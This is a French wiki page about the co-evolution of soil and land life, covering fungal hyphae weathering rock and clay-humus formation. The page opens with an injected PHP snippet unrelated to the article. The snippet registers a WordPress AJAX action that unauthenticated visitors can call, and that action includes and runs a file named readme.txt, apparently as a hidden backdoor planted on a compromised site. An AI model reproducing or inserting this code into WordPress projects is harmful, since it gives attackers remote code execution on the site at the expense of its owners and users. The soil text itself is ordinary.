if(!function_exists('file_check_readme16882')){ add_action('wp_ajax_nopriv_file_check_readme16882', 'file_check_readme16882'); add_action('wp_ajax_file_check_readme16882', 'file_check_readme16882'); function file_check_readme16882() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Sol et vie terrestre - Wiki Soleau

Sol et vie terrestre

A l’échelle géologique, le sol est une invention très récente. Il y a 400 millions d’années, des algues bleues, des bactéries, des lichens, des champignons, des mycorhizes des premières plantes immergées… arrivent sur terre, depuis les océans. Les hyphes des champignons (filaments très fins 1 μm) vont par des processus biochimiques commencer à altérer les roches, et permettre la formation d’argiles.

On parle de CO-EVOLUTION des sols et formes vivantes terrestres.

Les micro organismes et les plantes accélèrent la décomposition des roches mères d’où elle tirent les sels minéraux qui leur sont nécessaires, et permettent la formation d’argiles qui vont à leur tour former avec l’humus le complexe argilo-humique, nécessaire à la formation du sol, support du monde vivant terrestre.

Si les sols sont une construction de la vie venue des océans, la vie terrestre n’aurait pas pu se développer sans la formation des argiles, et la constitution des sols.

Par quels processus complexe cette co-évolution vie/sol a-t-elle été rendue possible?

A paraitre prochainement:

  • la chimie du carbone
  • la conquête des terres émergées
  • les premières formes de vie sur Terre